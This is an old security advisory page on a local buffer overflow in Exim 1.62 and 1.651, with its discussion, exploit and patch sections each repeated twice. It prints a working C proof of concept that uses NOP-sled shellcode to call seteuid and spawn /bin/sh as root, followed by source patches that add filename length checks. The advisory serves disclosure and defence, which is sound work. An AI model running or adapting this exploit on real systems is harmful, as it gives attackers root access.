Exim Buffer Overflow Vulnerability
BID:1859
Info
Exim Buffer Overflow Vulnerability
| Bugtraq ID: | 1859 |
| Class: | Boundary Condition Error |
| CVE: | |
| Remote: | No |
| Local: | Yes |
| Published: | Jul 21 1997 12:00AM |
| Updated: | Jul 21 1997 12:00AM |
| Credit: | This vulnerability was reported to bugtraq by D. J. Bernstein <[email protected]> Two patches supplied by Philip Hazel. |
| Vulnerable: |
University of Cambridge Exim 1.6.51 University of Cambridge Exim 1.6.2 |
| Not Vulnerable: |
University of Cambridge Exim 3.0 x University of Cambridge Exim 2.0 x |
Discussion
Exim Buffer Overflow Vulnerability
A potential local root yielding buffer overflow vulnerability exists in Exim mail client version 1.62.
A buffer used in processing filenames of message attachments can be overflowed by a maliciously-formed filename. As a result, the excessive data copied onto the stack can overwrite critical parts of the stack frame such as the calling functions' return address. Since this data is supplied by the user it can be a crafted so that alter the program's flow of execution. If properly exploited, this can yield root privilege to the attacker.
A potential local root yielding buffer overflow vulnerability exists in Exim mail client version 1.62.
A buffer used in processing filenames of message attachments can be overflowed by a maliciously-formed filename. As a result, the excessive data copied onto the stack can overwrite critical parts of the stack frame such as the calling functions' return address. Since this data is supplied by the user it can be a crafted so that alter the program's flow of execution. If properly exploited, this can yield root privilege to the attacker.
Exploit / POC
Exim Buffer Overflow Vulnerability
Exploit provided by D. J. Bernstein <[email protected]>
/* sample code for one OS/compiler combination; ./this ./exim -bt you */
char code[] = {
0x31,0xc0 /* eax = 0 */
, 0x50 /* push eax */
, 0xbb,0x98,0x30,0x04,0x00 /* ebx = 0x43098; &seteuid in my copy of exim */
, 0xff,0xd3 /* call ebx */
, 0x31,0xc0
, 0x50
, 0xb8,0x9a,0xd1,0x03,0x00 /* eax = 0x3d19a; &"/bin/sh" in my copy of exim */
, 0x50
, 0x50
, 0xbb,0xf8,0x29,0x04,0x00 /* ebx = 0x429f8; &execl in my copy of exim */
, 0xff,0xd3
, 0x00 /* just to terminate the last string in the environment */
} ;
char buf[1000];
char *env[1001];
void main(argc,argv)
int argc;
char **argv;
{
int i;
int j;
for (i = 0;i < sizeof buf;++i) buf[i] = 0x90; /* nop */
memcpy(buf + sizeof buf - sizeof code,code,sizeof code);
j = 0;
env[0] = buf;
for (i = 0;i < sizeof buf;++i) if (!buf[i]) env[++j] = buf + i + 1;
env[j] = 0;
if (argv[1]) execve(argv[1],argv + 1,env);
exit(1);
}
Exploit provided by D. J. Bernstein <[email protected]>
/* sample code for one OS/compiler combination; ./this ./exim -bt you */
char code[] = {
0x31,0xc0 /* eax = 0 */
, 0x50 /* push eax */
, 0xbb,0x98,0x30,0x04,0x00 /* ebx = 0x43098; &seteuid in my copy of exim */
, 0xff,0xd3 /* call ebx */
, 0x31,0xc0
, 0x50
, 0xb8,0x9a,0xd1,0x03,0x00 /* eax = 0x3d19a; &"/bin/sh" in my copy of exim */
, 0x50
, 0x50
, 0xbb,0xf8,0x29,0x04,0x00 /* ebx = 0x429f8; &execl in my copy of exim */
, 0xff,0xd3
, 0x00 /* just to terminate the last string in the environment */
} ;
char buf[1000];
char *env[1001];
void main(argc,argv)
int argc;
char **argv;
{
int i;
int j;
for (i = 0;i < sizeof buf;++i) buf[i] = 0x90; /* nop */
memcpy(buf + sizeof buf - sizeof code,code,sizeof code);
j = 0;
env[0] = buf;
for (i = 0;i < sizeof buf;++i) if (!buf[i]) env[++j] = buf + i + 1;
env[j] = 0;
if (argv[1]) execve(argv[1],argv + 1,env);
exit(1);
}
Solution / Fix
Exim Buffer Overflow Vulnerability
Solution:
The latest release of exim is version 3.16. Versions before 2.0x should be upgraded. Version 3.0x releases are also best upgraded.
See www.exim.org.
Patches supplied by author for versions 1.62 and 1.651:
--------------------------------------------------------------------
*** exim-1.62/src/parse.c Wed Apr 16 14:34:49 1997
--- parse.c Tue Jul 22 09:41:50 1997
***************
*** 1037,1042 ****
--- 1037,1048 ----
int extracted;
FILE *f;
+ if (len-9 > 255)
+ {
+ *error = "included file name is too long";
+ return -1;
+ }
+
strncpy(filename, s+9, len-9);
filename[len-9] = 0;
---snip--------------------------------------------------------------------
*** exim-1.651/src/parse.c Fri Jul 4 16:33:56 1997
--- parse.c Tue Jul 22 09:31:54 1997
***************
*** 1056,1061 ****
--- 1056,1067 ----
*error = string_sprintf("file name missing after :include:");
return -1;
}
+
+ if (flen > 255)
+ {
+ *error = string_sprintf("included file name \"%s\" is too long", t);
+ return -1;
+ }
strncpy(filename, t, flen);
filename[flen] = 0;
--------------------------------------------------------------------
Solution:
The latest release of exim is version 3.16. Versions before 2.0x should be upgraded. Version 3.0x releases are also best upgraded.
See www.exim.org.
Patches supplied by author for versions 1.62 and 1.651:
--------------------------------------------------------------------
*** exim-1.62/src/parse.c Wed Apr 16 14:34:49 1997
--- parse.c Tue Jul 22 09:41:50 1997
***************
*** 1037,1042 ****
--- 1037,1048 ----
int extracted;
FILE *f;
+ if (len-9 > 255)
+ {
+ *error = "included file name is too long";
+ return -1;
+ }
+
strncpy(filename, s+9, len-9);
filename[len-9] = 0;
---snip--------------------------------------------------------------------
*** exim-1.651/src/parse.c Fri Jul 4 16:33:56 1997
--- parse.c Tue Jul 22 09:31:54 1997
***************
*** 1056,1061 ****
--- 1056,1067 ----
*error = string_sprintf("file name missing after :include:");
return -1;
}
+
+ if (flen > 255)
+ {
+ *error = string_sprintf("included file name \"%s\" is too long", t);
+ return -1;
+ }
strncpy(filename, t, flen);
filename[flen] = 0;
--------------------------------------------------------------------